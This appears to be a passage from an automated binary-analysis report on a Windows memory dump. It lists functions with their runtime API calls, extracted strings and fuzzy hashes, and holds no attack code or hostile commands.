Part of subcall function 000FB6F7: HeapFree.KERNEL32(00000000,00000000,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?), ref: 000FB70D
Part of subcall function 000FB6F7: GetLastError.KERNEL32(?,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?,?), ref: 000FB71F

_free.LIBCMT ref: 000F79D4

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Heap$AllocateErrorFreeLast
String ID:
API String ID: 4150789928-0
Opcode ID: 154082496b9acf237029060d372eef8c910191af982dffc1b3896fd504335d32
Instruction ID: 718563de975ed28c6985646840ca5c1750e90986bbefe8f345be19e71a0d0a39
Opcode Fuzzy Hash: 154082496b9acf237029060d372eef8c910191af982dffc1b3896fd504335d32
Instruction Fuzzy Hash: 32518B3AA0C2095BDF149F689855AFA77E5CF84750F240059EB49DBA42EE328E03E661

Uniqueness

Uniqueness Score: -1.00%

Function 000E7004, Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 000E704D
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 000E70B8
LCMapStringEx.KERNEL32 ref: 000E70D5
LCMapStringEx.KERNEL32 ref: 000E7114
LCMapStringEx.KERNEL32 ref: 000E7173
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000E7196

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: c4b6683a67008cef41171962bce0c6b8ab549dccea4a23d46a507764cc0a32b0
Instruction ID: c83032da20b7117e196dc95f96d65f30b85e6d08e6f9ef3330531e772c7328df
Opcode Fuzzy Hash: c4b6683a67008cef41171962bce0c6b8ab549dccea4a23d46a507764cc0a32b0
Instruction Fuzzy Hash: 1B51AC7250434AEFEB209FAACC45FAF7BA9EF44790F1440A5F919BA190D731CD418B60

Uniqueness

Uniqueness Score: -1.00%

Function 000F02BD, Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 000F0301
DName::operator+.LIBCMT ref: 000F030D

Part of subcall function 000EAB09: shared_ptr.LIBCMT ref: 000EAB25

DName::operator+=.LIBCMT ref: 000F03CD

Part of subcall function 000EEB8C: DName::operator+.LIBCMT ref: 000EEBF7
Part of subcall function 000EEB8C: DName::operator+.LIBCMT ref: 000EEEB5

Part of subcall function 000EAA34: DName::operator+.LIBCMT ref: 000EAA55

DName::operator+.LIBCMT ref: 000F0388

Part of subcall function 000EAB61: DName::operator=.LIBVCRUNTIME ref: 000EAB82

DName::DName.LIBVCRUNTIME ref: 000F03F1
DName::operator+.LIBCMT ref: 000F03FD

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: 0a44105d2824e453a82ef21209f85f4a7395efe83dbfe3f7a0720e627dcdcba5
Instruction ID: 21966bd992d648ab9cff64a85ed85a11a32823390e54ac84f9b4c4b6b3d9cd50
Opcode Fuzzy Hash: 0a44105d2824e453a82ef21209f85f4a7395efe83dbfe3f7a0720e627dcdcba5
Instruction Fuzzy Hash: AD41C7B0B04248AFDB14DB64D891BEE7BE9AB0A300F444059F286B7A83D7346E44D755

Uniqueness

Uniqueness Score: -1.00%

Function 000158F0, Relevance: 9.1, APIs: 6, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00015923
std::_Lockit::_Lockit.LIBCPMT ref: 00015945
std::_Lockit::~_Lockit.LIBCPMT ref: 00015965
__Getctype.LIBCPMT ref: 00015A0C
std::_Facet_Register.LIBCPMT ref: 00015A35
std::_Lockit::~_Lockit.LIBCPMT ref: 00015A4D

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 7282d25da46a4231bab6ef83bc511b3500fff39b5a60930835ec6b18d0fd9f0c
Instruction ID: 764015db8ef816cbad58dd829781baba9f18dc210b81dcf7a3dc61bda63d3ffe
Opcode Fuzzy Hash: 7282d25da46a4231bab6ef83bc511b3500fff39b5a60930835ec6b18d0fd9f0c
Instruction Fuzzy Hash: B941CD70900A54CFCB11CF54D881BEEBBF4EF94720F148159E846AB292DB71E985CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 000E9658, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,000E964F,000E79B9,000E63FB), ref: 000E9666
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000E9674
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000E968D
SetLastError.KERNEL32(00000000,000E964F,000E79B9,000E63FB), ref: 000E96DF

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0aea78563c2aec377789bc893c677c7d96e811757200bf967b24ff9dded7b95f
Instruction ID: 7a33fdfe38a635d800d4568c8fd2d5759e1c8a1ea24b766d2d27320e0692eb8b
Opcode Fuzzy Hash: 0aea78563c2aec377789bc893c677c7d96e811757200bf967b24ff9dded7b95f
Instruction Fuzzy Hash: 3101FC32209715AFD77627F66C85ABA6788EB01B71720032FF524659F2FF515C816284

Uniqueness

Uniqueness Score: -1.00%

Function 00015EF0, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 162COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0001600B
___std_exception_copy.LIBVCRUNTIME ref: 000160AD

Strings

,qh, xrefs: 0001606A
,qh, xrefs: 00015F2B, 00015F2E
,qh, xrefs: 00015F22, 00015F57

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID: ,qh$,qh$,qh
API String ID: 2659868963-3136784641
Opcode ID: d95ea888fd26fdff029144c2e7eb2cff8c46ae48bc5dfd107d7ba7e9de941ae5
Instruction ID: 276fc1e81ee077896cc694c69021b0656266b0fcb1d7b93e2ed187e497cd34ff
Opcode Fuzzy Hash: d95ea888fd26fdff029144c2e7eb2cff8c46ae48bc5dfd107d7ba7e9de941ae5
Instruction Fuzzy Hash: 1E516B71900648DFCB15CFA8C845ADEFBB5FF49310F10862EE829AB651EB70A985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00034F60, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,6871E12C,0002161B,0002161B,?), ref: 00034F92
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00034FA0
__alldvrm.LIBCMT ref: 00034FB8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00034FD9

Strings

cannot get system clock, xrefs: 0003501A

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: PerformanceQuery$CounterFrequencyUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
String ID: cannot get system clock
API String ID: 15951272-2320554738
Opcode ID: 06cc47218a737dd5c9199c7c7414908525645e30fbb8e1c2e1dd6cab4b47cc11
Instruction ID: 56dedfa71069f48bce482a6d4779e3423973e2d10154dd6533fd7b8209727897
Opcode Fuzzy Hash: 06cc47218a737dd5c9199c7c7414908525645e30fbb8e1c2e1dd6cab4b47cc11
Instruction Fuzzy Hash: 3531AC72900308AFCB15DFE5DC45FDEBBBCEB48750F10452AF919AB291DB75A9048B90

Uniqueness

Uniqueness Score: -1.00%

Function 000F0AD7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,000F0B98,?,?,001ADA70,00000000,?,000F0CC3,00000004,InitializeCriticalSectionEx,00181274,InitializeCriticalSectionEx,00000000), ref: 000F0B67

Strings

api-ms-, xrefs: 000F0B27

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: af7719eafb6d51480425b7dd3d5c29e5968155009dfdde1f11f0d690c17c1dd2
Instruction ID: 1644802f6a4d5f7aa24557cfc3e1ae87fda41bc46d1ec25a7a01facc3b2edaca
Opcode Fuzzy Hash: af7719eafb6d51480425b7dd3d5c29e5968155009dfdde1f11f0d690c17c1dd2
Instruction Fuzzy Hash: 53110A32A41729ABCB628B68DC45B7D73D49F01775F240160FE15EB982D770EE409AD1

Uniqueness

Uniqueness Score: -1.00%

Function 000F7333, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,000F7328,?,?,000F72F0,?,?,?), ref: 000F7348
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000F735B
FreeLibrary.KERNEL32(00000000,?,?,000F7328,?,?,000F72F0,?,?,?), ref: 000F737E

Strings

mscoree.dll, xrefs: 000F7341
CorExitProcess, xrefs: 000F7353

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: fe8c8cabcf9f652313bc1de2bf0fa425385b2ce5cf5d78057148213e9408546e
Instruction ID: 0ce3b3d598a4d55e08121d1fe5ffd1cbdb97eb7558183c25b4a043b45a85466c
Opcode Fuzzy Hash: fe8c8cabcf9f652313bc1de2bf0fa425385b2ce5cf5d78057148213e9408546e
Instruction Fuzzy Hash: EEF03031904219FBDB57ABA0DD0DBAD7BB8EF0475AF140160FA05A55A0CB748F41FB92

Uniqueness

Uniqueness Score: -1.00%

Function 000F8CA6, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 000FCE83: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,000FCE2F,?,00000000,?,00101C73,?,00000004,00000000,?,?,?,000F7D0B), ref: 000FCEB5

_free.LIBCMT ref: 000F8DB5
_free.LIBCMT ref: 000F8DCC
_free.LIBCMT ref: 000F8DE9
_free.LIBCMT ref: 000F8E04
_free.LIBCMT ref: 000F8E1B

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 8ac09caaf8dfe7678e05acb212952f84fd6eb2eebf64fa474faa4ec31d97bd5d
Instruction ID: c71d623821d61f76d91ceb225aed2c4770123fa22bfc64c19df83f7c150df9df
Opcode Fuzzy Hash: 8ac09caaf8dfe7678e05acb212952f84fd6eb2eebf64fa474faa4ec31d97bd5d
Instruction Fuzzy Hash: A851C332A00208AFDB61DF69CC41BFA77F5FF54720B144569EA05DBA91EB31EA00DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00012EF0, Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

swap.LIBCMTD ref: 0001304F
swap.LIBCMTD ref: 00013091
swap.LIBCMTD ref: 000130D3
swap.LIBCMTD ref: 00013115
allocator.LIBCONCRTD ref: 00013166

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: swap$allocator
String ID:
API String ID: 2686961081-0
Opcode ID: fe44d0a5fb5c5f4447f74028356fa59c6dc649d424f0adb257528d3e2528a44c
Instruction ID: c3ae10658fd89239a8e80de39c511ac0df73297c533341163659368ad0882a74
Opcode Fuzzy Hash: fe44d0a5fb5c5f4447f74028356fa59c6dc649d424f0adb257528d3e2528a44c
Instruction Fuzzy Hash: C3611AB1D0411C8BCB29DF58DD81BD9B7B5BB68308F0441E9E589A7201EAB0AFD5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00018BD0, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00018C01
std::_Lockit::_Lockit.LIBCPMT ref: 00018C1F
std::_Lockit::~_Lockit.LIBCPMT ref: 00018C3F
std::_Facet_Register.LIBCPMT ref: 00018CF6
std::_Lockit::~_Lockit.LIBCPMT ref: 00018D0E

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: b65fdc827287e7e28b5717dae94ac768664b481512ba0df196f0111a3aeb3a84
Instruction ID: ed4dbfaeaef0f66b06898b4cfbe8a23fae79ef3b9a9a924db2a4d9cdf20b34f2
Opcode Fuzzy Hash: b65fdc827287e7e28b5717dae94ac768664b481512ba0df196f0111a3aeb3a84
Instruction Fuzzy Hash: 3D41DF71A016148FCB21CF54E980BEABBF4FB10754F148169E846AB392DB31EE81CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00102345, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0010235D

Part of subcall function 000FB6F7: HeapFree.KERNEL32(00000000,00000000,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?), ref: 000FB70D
Part of subcall function 000FB6F7: GetLastError.KERNEL32(?,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?,?), ref: 000FB71F

_free.LIBCMT ref: 0010236F
_free.LIBCMT ref: 00102381
_free.LIBCMT ref: 00102393
_free.LIBCMT ref: 001023A5

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ad1e1860eb6ade0e42dfe267895a062da8878d3162de45a8c2c24a3bccbca814
Instruction ID: 88ec87f72326e5803ffe3805682adad115a190f723312185ab0af0a29cb3fa4e
Opcode Fuzzy Hash: ad1e1860eb6ade0e42dfe267895a062da8878d3162de45a8c2c24a3bccbca814
Instruction Fuzzy Hash: FBF09C32514244E7C620DB69F8CED75B7E9BB057107940805F099DBD41DBB9FCC05A54

Uniqueness

Uniqueness Score: -1.00%

Function 000E525B, Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(001AD4A8,?,?,00013FA2,001ACFF0), ref: 000E5265
LeaveCriticalSection.KERNEL32(001AD4A8,?,00013FA2,001ACFF0), ref: 000E5298
RtlWakeAllConditionVariable.NTDLL ref: 000E530F
SetEvent.KERNEL32(?,001ACFF0), ref: 000E5319
ResetEvent.KERNEL32(?,001ACFF0), ref: 000E5325

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: 36e9cef1c0afe4d6237daeffeeecf2aaf2528150ff219cf74b67060e294c7799
Instruction ID: 91cc38a687e8337766676c61a8bd1f3b98648a6c561406a865968ec255a41c8b
Opcode Fuzzy Hash: 36e9cef1c0afe4d6237daeffeeecf2aaf2528150ff219cf74b67060e294c7799
Instruction Fuzzy Hash: BA018131601A10DFC711AF54FC48AD87BA8EF4E762B014069F80AABF71CB316D80CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00021C90, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

APIs

Part of subcall function 00034F30: InitializeCriticalSectionAndSpinCount.KERNEL32(00000078,00000FA0,00000000,00000078,?,00021D02,sqlite,?,0002161B,6871E12C), ref: 00034F40

allocator.LIBCONCRTD ref: 00021F74

Strings

handle, xrefs: 00021DF8
set, xrefs: 0002203F
sqlite, xrefs: 00021CCF

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpinallocator
String ID: handle$set$sqlite
API String ID: 1079084732-4075385795
Opcode ID: 95dd1fbe80f8ccfc5ae151d9e49abe31907391498765448005bde16057c57f61
Instruction ID: 0d4fef13124272387c3d8d080de6173dc010252c3e0ac9e73d5d89a67e411edb
Opcode Fuzzy Hash: 95dd1fbe80f8ccfc5ae151d9e49abe31907391498765448005bde16057c57f61
Instruction Fuzzy Hash: 07C1F371900248DFDB18DFA4DD85BEEBBB5EF59310F24411CE405BB682DB74AA84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0003F9C0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 294COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0003FAC2

Strings

,qh, xrefs: 0003FB0A, 0003FC1B, 0003FBC0
,qh, xrefs: 0003F9CC, 0003FABB
, xrefs: 0003FC8A

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv
String ID: $,qh$,qh
API String ID: 3732870572-3614726375
Opcode ID: 31405938a3103d6fb73db28d03ac69cd06c4f6a593d14e880b37b67743d8e0f1
Instruction ID: bf1aaac85c03fd2a47b0f9ff679931cda7d53afbae02d9419c301190b67b1b36
Opcode Fuzzy Hash: 31405938a3103d6fb73db28d03ac69cd06c4f6a593d14e880b37b67743d8e0f1
Instruction Fuzzy Hash: 88A1F571E0064A8FCF16DFA8D8845FEFBFAAF48314F288639E854A3351D77449818B91

Uniqueness

Uniqueness Score: -1.00%

Function 00033320, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00015A70: std::locale::_Init.LIBCPMT ref: 00015B68

std::locale::_Init.LIBCPMT ref: 00033409

Part of subcall function 000E68D8: std::_Lockit::_Lockit.LIBCPMT ref: 000E68EA
Part of subcall function 000E68D8: std::locale::_Setgloballocale.LIBCPMT ref: 000E6905
Part of subcall function 000E68D8: _Yarn.LIBCPMT ref: 000E691B
Part of subcall function 000E68D8: std::_Lockit::~_Lockit.LIBCPMT ref: 000E695B

allocator.LIBCONCRTD ref: 000335FD

Strings

", line , xrefs: 00033516
in file ", xrefs: 0003351E

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: std::locale::_$InitLockitstd::_$Lockit::_Lockit::~_SetgloballocaleYarnallocator
String ID: ", line $in file "
API String ID: 1438975912-4246217066
Opcode ID: 0ed6c9942d1dc66a4615a29b2f2616dedfbeb3811582b2e9e125c91c7d997c9c
Instruction ID: ebd2b8b4032e752102affda07846d14f676b0e7ad4a1a5fd1953cc1b16fb3ecb
